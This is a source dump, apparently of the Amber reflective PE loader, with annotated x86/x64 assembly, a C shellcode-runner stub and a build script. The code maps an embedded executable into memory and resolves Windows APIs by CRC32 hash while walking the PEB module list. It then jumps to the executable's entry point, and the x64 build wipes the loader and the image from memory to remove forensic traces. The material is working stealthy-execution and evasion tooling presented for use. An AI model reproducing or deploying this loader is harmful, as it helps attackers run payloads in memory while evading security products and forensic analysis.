77 | loc_140002966:
78 | mov eax,edx
79 | add rsp,0x20
80 | pop rbx
81 | pop rsi
82 | pop rdi
83 | pop rbp
84 | pop r12
85 | ret
--------------------------------------------------------------------------------
/loader/loader-x64/inc/run_tls_callbacks.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 | ; run_tls_callbacks(RCX = mapped image base) -> EAX = 1 if the image has a TLS directory (with or without callbacks), 0 if it has none.
3 | ; Reads IMAGE_TLS_DIRECTORY64.AddressOfCallBacks — an absolute VA, so relocate_image must already have run — and calls each callback as callback(base, 1 /* DLL_PROCESS_ATTACH */, 0) until the NULL terminator. Return values of the callbacks are ignored.
4 | run_tls_callbacks:
5 | push rsi
6 | push rbx
7 | sub rsp,0x28 ; shadow space for the callback calls, keeps RSP 16-byte aligned
8 | mov rsi,rcx ; rsi = image base
9 | movsxd rax,DWORD [rcx+0x3c] ; e_lfanew
10 | mov eax,DWORD [rcx+rax*1+0xd0] ; DataDirectory[9] (TLS).VirtualAddress
11 | mov edx,0x0 ; result = 0
12 | test eax,eax
13 | je loc_1400033ad ; no TLS directory → return 0
14 | mov eax,eax ; zero-extend the RVA
15 | mov rbx,QWORD [rcx+rax*1+0x18] ; rbx = AddressOfCallBacks
16 | mov edx,0x1
17 | test rbx,rbx
18 | jne loc_1400033ca ; NULL → nothing to call, return 1
19 | loc_1400033ad:
20 | mov eax,edx
21 | add rsp,0x28
22 | pop rbx
23 | pop rsi
24 | ret
25 | loc_1400033b6: ; invoke one callback
26 | mov r8d,0x0 ; arg3: Reserved = 0
27 | mov edx,0x1 ; arg2: DLL_PROCESS_ATTACH
28 | mov rcx,rsi ; arg1: image base
29 | call rax
30 | add rbx,0x8 ; next pointer in the callback array
31 | loc_1400033ca:
32 | mov rax,QWORD [rbx]
33 | test rax,rax
34 | jne loc_1400033b6 ; NULL terminates the array
35 | mov edx,0x1
36 | jmp loc_1400033ad
--------------------------------------------------------------------------------
/loader/loader-x64/loader-x64-lite.asm:
--------------------------------------------------------------------------------
1 | ;#==============================================#
2 | ;# X64 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#==============================================#
6 | ; Position-independent entry stub, "lite" build: nothing is embedded here; the raw PE image is expected to sit directly after pe_start. It maps, links, relocates and protects the image with the helpers included below, then jumps to the image's entry point. No helper return value is checked, so a failed map_image (RAX = 0) is dereferenced by resolve_imports; no stack-alignment fix-up is done here either.
7 | [BITS 64]
8 |
9 | %define e_lfanew 0x3C ; IMAGE_DOS_HEADER.e_lfanew
10 | %define _AddressOfEntry 0x28 ; IMAGE_OPTIONAL_HEADER64.AddressOfEntryPoint, relative to the NT headers
11 | loader_size equ pe_start-loader ; bytes from `loader` to the end of the included helpers
12 |
13 |
14 | call loader ; Push the address of `loader` (the next byte) as a return address
15 | loader:
16 | pop rsi ; RSI = address of `loader`
17 | add rsi, loader_size ; RSI = pe_start, i.e. the PE image appended after this code
18 | push rbp ; Save RBP
19 | mov rbp,rsp ; Create a stack frame
20 | mov rcx,rsi ; Move the image address as first parameter
21 | call map_image ; Perform PE image mapping (RAX = new base, or 0 on failure — not checked)
22 | mov rdi, rax ; Get the address of mapped PE image into RDI
23 | mov rcx, rdi ; Move a copy of the mapped image address into RCX as first parameter
24 | call resolve_imports ; Resolve image imports
25 | mov rcx, rdi ; Set the mapped image address as first parameter
26 | call relocate_image ; Perform image base relocation
27 | mov rcx, rdi ; Set the mapped image address as first parameter
28 | call protect_sections ; Apply proper section memory protections
29 | mov rcx, rdi ; Set the mapped image address as first parameter
30 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
31 | xor rax, rax ; Clear out RAX
32 | mov eax, DWORD [rdi+e_lfanew] ; Get the file header offset
33 | mov eax, DWORD [rdi+rax+_AddressOfEntry] ; Get the AddressOfEntry into EAX
34 | add rax,rdi ; Add the AOE onto new image base
35 | cld ; Clear direction flags (the rep-string helpers above already assumed DF was clear)
36 | mov rsp, rbp ; Restore stack frame
37 | pop rbp ; Restore RBP
38 | jmp rax ; Jmp to the PE->AOE; the loader code and the raw image stay in memory behind it
39 | ; ------------------------ FUNCTIONS ------------------------------------
40 | %include "./inc/memcpy.asm"
41 | %include "./inc/calc_crc.asm"
42 | %include "./inc/map_image.asm"
43 | %include "./inc/load_module.asm"
44 | %include "./inc/relocate_image.asm"
45 | %include "./inc/resolve_imports.asm"
46 | %include "./inc/get_proc_by_crc.asm"
47 | %include "./inc/get_module_by_crc.asm"
48 | %include "./inc/protect_sections.asm"
49 | %include "./inc/run_tls_callbacks.asm"
50 | %include "../crc32_api/crc32_api_x64.asm" ; provides api_call (hash -> export address), used via R10 by the helpers; lives outside this directory, presumably a submodule
51 | ;------------------------ FUNCTIONS -------------------------------------
52 | pe_start:
--------------------------------------------------------------------------------
/loader/loader-x64/loader-x64.asm:
--------------------------------------------------------------------------------
1 | ;#==============================================#
2 | ;# X64 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#==============================================#
6 | ; Position-independent entry stub with the PE embedded inline (incbin). After mapping, linking, relocating and protecting the image, the `wipe` tail overwrites the initial call, the embedded image and the loader code itself before jumping to the entry point. No helper return value is checked, so a failed map_image (RAX = 0) is dereferenced by resolve_imports.
7 | [BITS 64]
8 |
9 | %define e_lfanew 0x3C ; IMAGE_DOS_HEADER.e_lfanew
10 | %define _AddressOfEntry 0x28 ; IMAGE_OPTIONAL_HEADER64.AddressOfEntryPoint, relative to the NT headers
11 |
12 | call start ; Push the address of the embedded PE (the byte after this call) as a return address
13 | incbin "putty.exe" ; PE file, embedded verbatim; `start` follows it immediately.
14 | start:
15 | pop rsi ; Get the address of PE to RSI
16 | push rbp ; Save RBP
17 | mov rbp,rsp ; Create a stack frame
18 | mov rcx,rsi ; Move the image address as first parameter
19 | call map_image ; Perform PE image mapping (RAX = new base, or 0 on failure — not checked)
20 | mov rdi, rax ; Get the address of mapped PE image into RDI
21 | mov rcx, rdi ; Move a copy of the mapped image address into RCX as first parameter
22 | call resolve_imports ; Resolve image imports
23 | mov rcx, rdi ; Set the mapped image address as first parameter
24 | call relocate_image ; Perform image base relocation
25 | mov rcx, rdi ; Set the mapped image address as first parameter
26 | call protect_sections ; Apply proper section memory protections
27 | mov rcx, rdi ; Set the mapped image address as first parameter
28 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
29 | xor rax, rax ; Clear out RAX
30 | mov eax, DWORD [rdi+e_lfanew] ; Get the file header offset
31 | mov eax, DWORD [rdi+rax+_AddressOfEntry] ; Get the AddressOfEntry into EAX
32 | add rax,rdi ; Add the AOE onto new image base
33 | jmp wipe ; Start wiping memory artifacts... (RAX = entry point is carried through the wipe)
34 | ; ------------------------ FUNCTIONS ------------------------------------
35 | %include "./inc/memcpy.asm"
36 | %include "./inc/calc_crc.asm"
37 | %include "./inc/map_image.asm"
38 | %include "./inc/load_module.asm"
39 | %include "./inc/relocate_image.asm"
40 | %include "./inc/resolve_imports.asm"
41 | %include "./inc/get_proc_by_crc.asm"
42 | %include "./inc/get_module_by_crc.asm"
43 | %include "./inc/protect_sections.asm"
44 | %include "./inc/run_tls_callbacks.asm"
45 | %include "../crc32_api/crc32_api_x64.asm" ; provides api_call (hash -> export address), used via R10 by the helpers; lives outside this directory, presumably a submodule
46 | ;------------------------ FUNCTIONS -------------------------------------
47 | wipe: ; overwrite everything from the initial `call start` up to (not including) the rep stosb below
48 | wipe_len_delta equ wipe_end-wipe ; size of the wipe code preceding rep stosb
49 | call $+5 ; Push the address of the next instruction (RIP, not EIP, on x64)
50 | pop rcx ; RCX = address of this pop
51 | sub rcx,rsi ; RCX = distance from the PE start to here
52 | add rcx,wipe_len_delta ; ... plus the wipe code, i.e. RCX = wipe_end + 5 - RSI bytes in total
53 | mov rdi,rsi ; Move the PE address to RDI
54 | sub rdi,0x5 ; Go back 5 bytes for wiping the initial call as well
55 | wipe_end:
56 | rep stosb ; Store AL into [RDI], RCX times, incrementing RDI (assumes DF is clear; cld only runs afterwards). NOTE(review): AL is not cleared — RAX holds the entry address, so the fill byte is its low byte rather than 0. This instruction and the five after it survive the wipe.
57 | ; -------------------- SWITCH TO PE ----------------------------
58 | cld ; Clear direction flags
59 | mov rsp, rbp ; Restore stack frame
60 | pop rbp ; Restore RBP
61 | jmp rax ; Jmp to the PE->AOE
--------------------------------------------------------------------------------
/loader/loader-x64/stub.c:
--------------------------------------------------------------------------------
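1 | #include <windows.h>
2 | #include <string.h>
3 | #include "shellcode.h"
4 |
5 | /*
6 |  * Test harness for the assembled x64 loader. shellcode.h (presumably produced
7 |  * by the build script with `xxd -i`) defines the `shellcode` byte array; it is
8 |  * copied into a fresh read/write/execute allocation and called as a function.
9 |  * The loader jumps to the embedded PE's entry point instead of returning.
10 |  */
11 | int main(int argc, char const *argv[])
12 | {
13 |     (void)argc;
14 |     (void)argv;
15 |     char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
16 |     if (BUFFER == NULL) {
17 |         return 1; /* allocation failed: do not copy into / call through NULL */
18 |     }
19 |     memcpy(BUFFER, shellcode, sizeof(shellcode));
20 |     (*(void(*)())BUFFER)();
21 |     return 0;
22 | }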
11 |
--------------------------------------------------------------------------------
/loader/loader-x86/amber_loader-x86-lite.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/loader/loader-x86/amber_loader-x86-lite.bin
--------------------------------------------------------------------------------
/loader/loader-x86/build.sh:
--------------------------------------------------------------------------------
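1 | #!/bin/bash
2 | # Build the x86 loader test binary:
3 | #   1. assemble loader-x86.asm into a flat binary ("shellcode"),
4 | #   2. turn it into a C array header with xxd -i,
5 | #   3. compile stub.c (which includes that header) with the MinGW cross compiler.
6 | # Requires nasm, xxd and i686-w64-mingw32-gcc on PATH; aborts with status 1 on the first failure.
7 | ## ANSI Colors (FG & BG)
8 | RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" YELLOW="$(printf '\033[33m')" BLUE="$(printf '\033[34m')"
9 | MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
10 | REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" YELLOWBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')"
11 | MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
12 | RESET="$(printf '\e[0m')"
13 |
14 | # Message helpers; $1 is the text to print.
15 | print_warning() {
16 |     echo "${YELLOW}[!] ${RESET}${1}"
17 | }
18 | print_error() {
19 |     echo "${RED}[-] ${RESET}${1}"
20 | }
21 | # Print the message and abort the whole script with a non-zero exit status.
22 | print_fatal() {
23 |     echo -e "${RED}[!] ${1}\n${RESET}"
24 |     exit 1
25 | }
26 | print_good() {
27 |     echo "${GREEN}[+] ${RESET}${1}"
28 | }
29 | print_status() {
30 |     echo "${YELLOW}[*] ${RESET}${1}"
31 | }
32 |
33 | nasm -f bin loader-x86.asm -o shellcode || print_fatal "nasm failed!"
34 | print_status "Payload Size: $(wc -c < shellcode | tr -d ' ')"
35 | [[ -f shellcode ]] && xxd -i shellcode shellcode.h
36 |
37 | i686-w64-mingw32-gcc stub.c -o test.exe || print_fatal "Compilation failed!"
38 | cp test.exe /tmp/ # copy for manual testing; /tmp is shared and world-writable
39 | rm -f shellcode shellcode.h # intermediates; -f keeps cleanup quiet if one is missing
40 | print_good "Build done!"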
34 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/calc_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 | ; calc_crc(esp+4 = buffer, esp+8 = length) -> EAX = hardware CRC32C (SSE4.2 `crc32` instruction, Castagnoli polynomial) of the bytes, starting from 0 with no final XOR — not the zlib CRC32.
3 | ; Only the low 16 bits of length are used (test dx,dx / movzx edx,dx); a zero low half switches to NUL-terminated string mode. Within this loader, ANSI export names are hashed with length 0 and module names with the UNICODE_STRING byte length. Requires a CPU with SSE4.2.
4 | calc_crc:
5 | loc_40b22f: mov eax,DWORD [esp+0x4] ; eax = buffer
6 | loc_40b233: mov edx,DWORD [esp+0x8] ; edx = length
7 | loc_40b237: test dx,dx ; only the low 16 bits of the length are looked at
8 | loc_40b23a: je loc_40b256 ; 0 → string mode
9 | loc_40b23c: mov ecx,eax ; ecx = cursor
10 | loc_40b23e: movzx edx,dx
11 | loc_40b241: add eax,edx ; eax = end pointer
12 | loc_40b243: mov edx,0x0 ; crc = 0
13 | loc_40b248: crc32 edx,BYTE [ecx] ; fold one byte
14 | loc_40b24d: add ecx,0x1
15 | loc_40b250: cmp ecx,eax
16 | loc_40b252: jne loc_40b248
17 | loc_40b254: jmp loc_40b275 ; return edx
18 | loc_40b256: movzx ecx,BYTE [eax] ; string mode: first byte
19 | loc_40b259: test cl,cl
20 | loc_40b25b: je loc_40b278 ; empty string → 0
21 | loc_40b25d: add eax,0x1
22 | loc_40b260: mov edx,0x0 ; crc = 0
23 | loc_40b265: crc32 edx,cl ; fold one byte
24 | loc_40b26a: add eax,0x1
25 | loc_40b26d: movzx ecx,BYTE [eax-0x1] ; next byte
26 | loc_40b271: test cl,cl
27 | loc_40b273: jne loc_40b265 ; until the NUL
28 | loc_40b275: mov eax,edx
29 | loc_40b277: ret
30 | loc_40b278: mov edx,0x0
31 | loc_40b27d: jmp loc_40b275
32 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/get_module_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 | ; get_module_by_crc(esp+4 = calc_crc hash of a module's BaseDllName as UTF-16LE bytes) -> EAX = DllBase of the first matching loaded module, or 0.
3 | ; Walks PEB->Ldr->InMemoryOrderModuleList (PEB from fs:[0x30], Ldr at PEB+0xc, list head at Ldr+0x14); the fields read below are relative to each entry's InMemoryOrderLinks (DllBase +0x10, BaseDllName.Length +0x24, BaseDllName.Buffer +0x28).
4 | get_module_by_crc:
5 | loc_4077e7: push edi
6 | loc_4077e8: push esi
7 | loc_4077e9: push ebx
8 | loc_4077ea: sub esp,0x8 ; outgoing argument area for calc_crc
9 | loc_4077ed: mov edi,DWORD [esp+0x18] ; edi = target hash
10 | loc_4077f1: mov eax,fs:0x30 ; PEB
11 | loc_4077f7: mov eax,DWORD [eax+0xc] ; PEB.Ldr
12 | loc_4077fa: lea esi,[eax+0x14] ; esi = list head (loop terminator)
13 | loc_4077fd: mov ebx,DWORD [eax+0x14] ; ebx = first entry (Flink)
14 | loc_407800: cmp esi,ebx
15 | loc_407802: je loc_407832 ; empty list → 0
16 | loc_407804: movzx eax,WORD [ebx+0x24] ; BaseDllName.Length (bytes)
17 | loc_407808: mov DWORD [esp+0x4],eax ; arg2: length
18 | loc_40780c: mov eax,DWORD [ebx+0x28] ; BaseDllName.Buffer
19 | loc_40780f: mov DWORD [esp],eax ; arg1: buffer
20 | loc_407812: call calc_crc ; hash the UTF-16 name bytes
21 | loc_407817: cmp eax,edi
22 | loc_407819: je loc_407828 ; match
23 | loc_40781b: mov ebx,DWORD [ebx] ; Flink → next entry
24 | loc_40781d: cmp esi,ebx
25 | loc_40781f: jne loc_407804 ; stop when the list wraps back to its head
26 | loc_407821: mov eax,0x0 ; not found
27 | loc_407826: jmp loc_40782b
28 | loc_407828: mov eax,DWORD [ebx+0x10] ; DllBase
29 | loc_40782b: add esp,0x8
30 | loc_40782e: pop ebx
31 | loc_40782f: pop esi
32 | loc_407830: pop edi
33 | loc_407831: ret
34 | loc_407832: mov eax,0x0
35 | loc_407837: jmp loc_40782b
36 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/get_proc_by_crc.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 | ; get_proc_by_crc(ebp+8 = module base, ebp+0xc = calc_crc hash of the export name, ebp+0x10 = name-table index or 0xffffffff for none) -> EAX = export address, or 0.
3 | ; Scans the export name table hashing each name; a hit on the hash OR on the index selects the export. A forwarded export (address inside the export directory, pointing at a "DLL.Func" string) is followed by splitting at '.', loading the target with load_module and recursing with the hash of the function part. Uses AVX (vpxor/vmovdqu) in addition to calc_crc's SSE4.2.
4 | get_proc_by_crc:
5 | loc_408e97: push ebp
6 | loc_408e98: mov ebp,esp
7 | loc_408e9a: push edi
8 | loc_408e9b: push esi
9 | loc_408e9c: push ebx
10 | loc_408e9d: and esp,0xfffffff0 ; 16-byte align the frame
11 | loc_408ea0: sub esp,0x240 ; locals: module-name buffer at +0x38, function-name buffer at +0x13c (260 bytes each)
12 | loc_408ea6: mov ebx,DWORD [ebp+0x8] ; ebx = module base
13 | loc_408ea9: mov eax,ebx
14 | loc_408eab: add eax,DWORD [ebx+0x3c] ; eax = IMAGE_NT_HEADERS
15 | loc_408eae: mov edx,ebx
16 | loc_408eb0: add edx,DWORD [eax+0x78] ; edx = IMAGE_EXPORT_DIRECTORY (DataDirectory[0].VirtualAddress for PE32)
17 | loc_408eb3: mov eax,DWORD [eax+0x7c] ; export directory size
18 | loc_408eb6: mov DWORD [esp+0x1c],eax ; saved for the forwarder range check
19 | loc_408eba: mov edi,DWORD [edx+0x20] ; AddressOfNames (RVA)
20 | loc_408ebd: mov eax,DWORD [edx+0x1c] ; AddressOfFunctions (RVA)
21 | loc_408ec0: mov DWORD [esp+0x2c],eax
22 | loc_408ec4: mov eax,DWORD [edx+0x24] ; AddressOfNameOrdinals (RVA)
23 | loc_408ec7: mov DWORD [esp+0x28],eax
24 | loc_408ecb: mov ecx,DWORD [edx+0x18] ; NumberOfNames
25 | loc_408ece: test ecx,ecx
26 | loc_408ed0: je loc_409041 ; no named exports → 0
27 | loc_408ed6: mov esi,0x0 ; esi = name index
28 | loc_408edb: add edi,ebx ; edi = name table (absolute)
29 | loc_408edd: mov DWORD [esp+0x24],edx
30 | loc_408ee1: mov DWORD [esp+0x20],ecx
31 | loc_408ee5: mov DWORD [esp+0x4],0x0 ; calc_crc(base + names[esi], 0): NUL-terminated mode
32 | loc_408eed: mov eax,ebx
33 | loc_408eef: add eax,DWORD [edi+esi*4]
34 | loc_408ef2: mov DWORD [esp],eax
35 | loc_408ef5: call calc_crc
36 | loc_408efa: cmp DWORD [ebp+0x10],esi ; NOTE(review): the third argument is matched against the name-table index, not against an export ordinal (ordinal - Base); a by-ordinal lookup therefore picks the wrong export unless the tables happen to line up
37 | loc_408efd: je loc_408f19
38 | loc_408eff: cmp eax,DWORD [ebp+0xc] ; hash match?
39 | loc_408f02: je loc_408f19
40 | loc_408f04: add esi,0x1
41 | loc_408f07: mov eax,DWORD [esp+0x20]
42 | loc_408f0b: cmp esi,eax
43 | loc_408f0d: jne loc_408ee5
44 | loc_408f0f: mov eax,0x0 ; exhausted → 0
45 | loc_408f14: jmp loc_409023
46 | loc_408f19: mov edx,DWORD [esp+0x24] ; found: edx = export directory
47 | loc_408f1d: lea eax,[ebx+esi*2]
48 | loc_408f20: mov ecx,DWORD [esp+0x28]
49 | loc_408f24: movzx eax,WORD [eax+ecx*1] ; ordinal = NameOrdinals[esi]
50 | loc_408f28: lea eax,[ebx+eax*4]
51 | loc_408f2b: mov ecx,DWORD [esp+0x2c]
52 | loc_408f2f: add ebx,DWORD [eax+ecx*1] ; ebx = base + Functions[ordinal]
53 | loc_408f32: cmp ebx,edx
54 | loc_408f34: jb loc_409021 ; below the export directory → regular export, return it
55 | loc_408f3a: mov eax,DWORD [esp+0x1c]
56 | loc_408f3e: add edx,eax
57 | loc_408f40: cmp ebx,edx
58 | loc_408f42: jae loc_409021 ; beyond it → regular export, return it
59 | loc_408f48: vpxor xmm0,xmm0,xmm0 ; forwarded export: zero both name buffers (AVX; compiler-generated)
60 | loc_408f4c: vmovdqu [esp+0x38],xmm0
61 | loc_408f52: lea edi,[esp+0x48]
62 | loc_408f56: mov eax,0x0
63 | loc_408f5b: mov ecx,0x3d
64 | loc_408f60: rep stosd ; 16 + 0x3d*4 = 260 bytes
65 | loc_408f62: vmovdqu [esp+0x13c],xmm0
66 | loc_408f6b: lea edi,[esp+0x14c]
67 | loc_408f72: mov ecx,0x3d
68 | loc_408f77: rep stosd
69 | loc_408f79: cmp BYTE [ebx],0x2e ; forwarder string starts with '.'?
70 | loc_408f7c: je loc_40902b ; → empty module name
71 | loc_408f82: mov esi,0x0 ; find the '.' separating module and function; unbounded, assumes one exists
72 | loc_408f87: add esi,0x1
73 | loc_408f8a: mov eax,esi
74 | loc_408f8c: cmp BYTE [ebx+esi*1],0x2e
75 | loc_408f90: jne loc_408f87
76 | loc_408f92: lea edx,[esp+0x38] ; memcpy(module buffer, forwarder, index of '.') — not checked against the 260-byte buffer
77 | loc_408f96: mov DWORD [esp+0x8],eax
78 | loc_408f9a: mov DWORD [esp+0x4],ebx
79 | loc_408f9e: mov DWORD [esp],edx
80 | loc_408fa1: call memcpy
81 | loc_408fa6: lea ecx,[ebx+esi*1+0x1] ; ecx = text after the '.'
82 | loc_408faa: cmp BYTE [ecx],0x0
83 | loc_408fad: je loc_40903a ; empty function name
84 | loc_408fb3: mov eax,0x0 ; strlen of the function part → edx
85 | loc_408fb8: add esi,ebx
86 | loc_408fba: add eax,0x1
87 | loc_408fbd: mov edx,eax
88 | loc_408fbf: cmp BYTE [esi+eax*1+0x1],0x0
89 | loc_408fc4: jne loc_408fba
90 | loc_408fc6: lea eax,[esp+0x13c] ; memcpy(function buffer, after '.', len)
91 | loc_408fcd: mov DWORD [esp+0x8],edx
92 | loc_408fd1: mov DWORD [esp+0x4],ecx
93 | loc_408fd5: mov DWORD [esp],eax
94 | loc_408fd8: call memcpy
95 | loc_408fdd: lea eax,[esp+0x38]
96 | loc_408fe1: mov DWORD [esp],eax
97 | loc_408fe4: call load_module ; load the forward target module by its (extension-less) name
98 | loc_408fe9: mov ebx,eax
99 | loc_408feb: mov eax,0x0
100 | loc_408ff0: test ebx,ebx
101 | loc_408ff2: je loc_409023 ; could not load → 0
102 | loc_408ff4: mov DWORD [esp+0x4],0x0 ; calc_crc(function buffer, 0)
103 | loc_408ffc: lea eax,[esp+0x13c]
104 | loc_409003: mov DWORD [esp],eax
105 | loc_409006: call calc_crc ; NOTE(review): a by-ordinal forwarder ("DLL.#n") is hashed as a name here and will not resolve
106 | loc_40900b: mov DWORD [esp+0x8],0xffffffff ; recurse: get_proc_by_crc(target module, hash, no index)
107 | loc_409013: mov DWORD [esp+0x4],eax
108 | loc_409017: mov DWORD [esp],ebx
109 | loc_40901a: call get_proc_by_crc
110 | loc_40901f: mov ebx,eax
111 | loc_409021: mov eax,ebx ; return the resolved address
112 | loc_409023: lea esp,[ebp-0xc] ; discard the aligned frame
113 | loc_409026: pop ebx
114 | loc_409027: pop esi
115 | loc_409028: pop edi
116 | loc_409029: pop ebp
117 | loc_40902a: ret
118 | loc_40902b: mov esi,0x0 ; forwarder begins with '.': module part is empty (index 0, length 0)
119 | loc_409030: mov eax,0x0
120 | loc_409035: jmp loc_408f92
121 | loc_40903a: mov edx,0x0 ; empty function part: copy length 0
122 | loc_40903f: jmp loc_408fc6
123 | loc_409041: mov eax,0x0 ; no named exports → 0
124 | loc_409046: jmp loc_409023
125 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/load_module.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 | ; load_module(esp+4 = NUL-terminated ANSI module name) -> EAX = module handle/base as returned by the loader API, or 0 on failure.
3 | ; Widens the name to UTF-16 in a stack buffer, wraps it in a UNICODE_STRING and calls the API that api_call resolves for hash 0xB4EBB9A4, passed on the stack in this 32-bit build (argument layout matches LdrLoadDll(NULL, 0, &name, &handle) — confirm against crc32_api). The loc_111111/loc_222222/loc_xxxxxx labels mark the hand-inserted hash/call sequence in otherwise compiler-generated code.
4 | load_module:
5 | loc_40a08a: push edi
6 | loc_40a08b: push ebx
7 | loc_40a08c: sub esp,0x234 ; frame: UTF-16 buffer at +0x1c, UNICODE_STRING at +0x224, handle out-param at +0x22c
8 | loc_40a092: mov ebx,DWORD [esp+0x240] ; ebx = ANSI name
9 | loc_40a099: mov DWORD [esp+0x22c],0x0 ; handle = 0
10 | loc_40a0a4: lea edi,[esp+0x1c]
11 | loc_40a0a8: mov ecx,0x82
12 | loc_40a0ad: mov eax,0x0
13 | loc_40a0b2: rep stosd ; zero 0x82*4 = 0x208 bytes: room for 260 WCHARs (assumes DF is clear)
14 | loc_40a0b4: cmp BYTE [ebx],0x0
15 | loc_40a0b7: je loc_40a14c ; empty name → empty UNICODE_STRING
16 | loc_40a0bd: mov edx,0x0
17 | loc_40a0c2: mov eax,edx ; strlen: exits with edx = length, eax = length - 1
18 | loc_40a0c4: add edx,0x1
19 | loc_40a0c7: cmp BYTE [ebx+edx*1],0x0
20 | loc_40a0cb: jne loc_40a0c2
21 | loc_40a0cd: add edx,edx ; 2*len bytes
22 | loc_40a0cf: mov WORD [esp+0x224],dx ; UNICODE_STRING.Length
23 | loc_40a0d7: add edx,0x2
24 | loc_40a0da: mov WORD [esp+0x226],dx ; UNICODE_STRING.MaximumLength = Length + 2
25 | loc_40a0e2: lea edx,[esp+0x1c]
26 | loc_40a0e6: mov DWORD [esp+0x228],edx ; UNICODE_STRING.Buffer
27 | loc_40a0ed: test eax,eax
28 | loc_40a0ef: js loc_40a103
29 | loc_40a0f1: movsx dx,BYTE [ebx+eax*1] ; widen from the last char down to index 0. NOTE(review): movsx sign-extends, so bytes >= 0x80 become 0xFFxx — ASCII names only
30 | loc_40a0f6: mov WORD [esp+eax*2+0x1c],dx ; NOTE(review): no length bound; a name longer than 260 chars writes past the buffer
31 | loc_40a0fb: sub eax,0x1
32 | loc_40a0fe: cmp eax,0xffffffff
33 | loc_40a101: jne loc_40a0f1
34 | loc_40a103: lea eax,[esp+0x22c] ; arg4: &handle (out)
35 | loc_40a10a: mov DWORD [esp+0xc],eax
36 | loc_40a10e: lea eax,[esp+0x224] ; arg3: &UNICODE_STRING
37 | loc_40a115: mov DWORD [esp+0x8],eax
38 | loc_40a119: mov DWORD [esp+0x4],0x0 ; arg2: 0
39 | loc_40a121: mov DWORD [esp],0x0 ; arg1: NULL
40 | loc_111111: push 0xB4EBB9A4 ; hash consumed by api_call (stack argument in the 32-bit build)
41 | loc_222222: call api_call ; EAX = resolved function pointer
42 | loc_xxxxxx: add esp,4 ; drop the hash
43 | loc_40a128: call eax ; invoke it with the four arguments at [esp..esp+0xc]
44 | loc_40a12e: sub esp,0x10 ; the stdcall callee popped its 4 arguments; restore the frame
45 | loc_40a131: test eax,eax
46 | loc_40a133: js loc_40a145 ; negative NTSTATUS → failure
47 | loc_40a135: mov eax,DWORD [esp+0x22c] ; success → return the handle
48 | loc_40a13c: add esp,0x234
49 | loc_40a142: pop ebx
50 | loc_40a143: pop edi
51 | loc_40a144: ret
52 | loc_40a145: mov eax,0x0 ; failure → 0
53 | loc_40a14a: jmp loc_40a13c
54 | loc_40a14c: mov WORD [esp+0x224],0x0 ; empty name: Length 0, MaximumLength 2, Buffer = the zeroed stack buffer
55 | loc_40a156: mov WORD [esp+0x226],0x2
56 | loc_40a160: lea eax,[esp+0x1c]
57 | loc_40a164: mov DWORD [esp+0x228],eax
58 | loc_40a16b: jmp loc_40a103
59 |
--------------------------------------------------------------------------------
/loader/loader-x86/inc/map_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 32]
2 | ; map_image(esp+4 = raw PE image in memory) -> EAX = base of a fresh, section-mapped copy, or 0 (bad signature or allocation failure).
3 | ; Allocates SizeOfImage bytes read/write via the API api_call resolves for hash 0x99CE7C55 (argument layout matches NtAllocateVirtualMemory — confirm against crc32_api), copies the headers, then copies every section to its VirtualAddress. All offsets are taken from the image as-is; nothing is range-checked.
4 | map_image:
5 | loc_401f00: push ebp
6 | loc_401f01: push edi
7 | loc_401f02: push esi
8 | loc_401f03: push ebx
9 | loc_401f04: sub esp,0x3c ; outgoing arguments at +0..+0x14, out-params at +0x28 (RegionSize) and +0x2c (BaseAddress)
10 | loc_401f07: mov ebp,DWORD [esp+0x50] ; ebp = raw image
11 | loc_401f0b: mov edi,ebp
12 | loc_401f0d: add edi,DWORD [ebp+0x3c] ; edi = IMAGE_NT_HEADERS (e_lfanew)
13 | loc_401f10: mov eax,0x0
14 | loc_401f15: cmp DWORD [edi],0x4550 ; "PE\0\0"
15 | loc_401f1b: jne loc_401fcf ; not a PE → return 0
16 | loc_401f21: mov DWORD [esp+0x2c],0x0 ; BaseAddress = NULL (any address)
17 | loc_401f29: mov eax,DWORD [edi+0x50] ; OptionalHeader.SizeOfImage
18 | loc_401f2c: mov DWORD [esp+0x28],eax ; RegionSize
19 | loc_401f30: mov DWORD [esp+0x14],0x4 ; arg6: 0x4 = PAGE_READWRITE (final protections are applied later by protect_sections)
20 | loc_401f38: mov DWORD [esp+0x10],0x103000 ; arg5: 0x103000 = MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN
21 | loc_401f40: lea eax,[esp+0x28]
22 | loc_401f44: mov DWORD [esp+0xc],eax ; arg4: &RegionSize
23 | loc_401f48: mov DWORD [esp+0x8],0x0 ; arg3: 0
24 | loc_401f50: lea eax,[esp+0x2c]
25 | loc_401f54: mov DWORD [esp+0x4],eax ; arg2: &BaseAddress
26 | loc_401f58: mov DWORD [esp],0xffffffff ; arg1: current-process pseudo handle (-1)
27 | loc_333333: push 0x99CE7C55 ; hash consumed by api_call (stack argument in the 32-bit build)
28 | loc_444444: call api_call ; EAX = resolved function pointer
29 | loc_yyyyyy: add esp,4 ; drop the hash
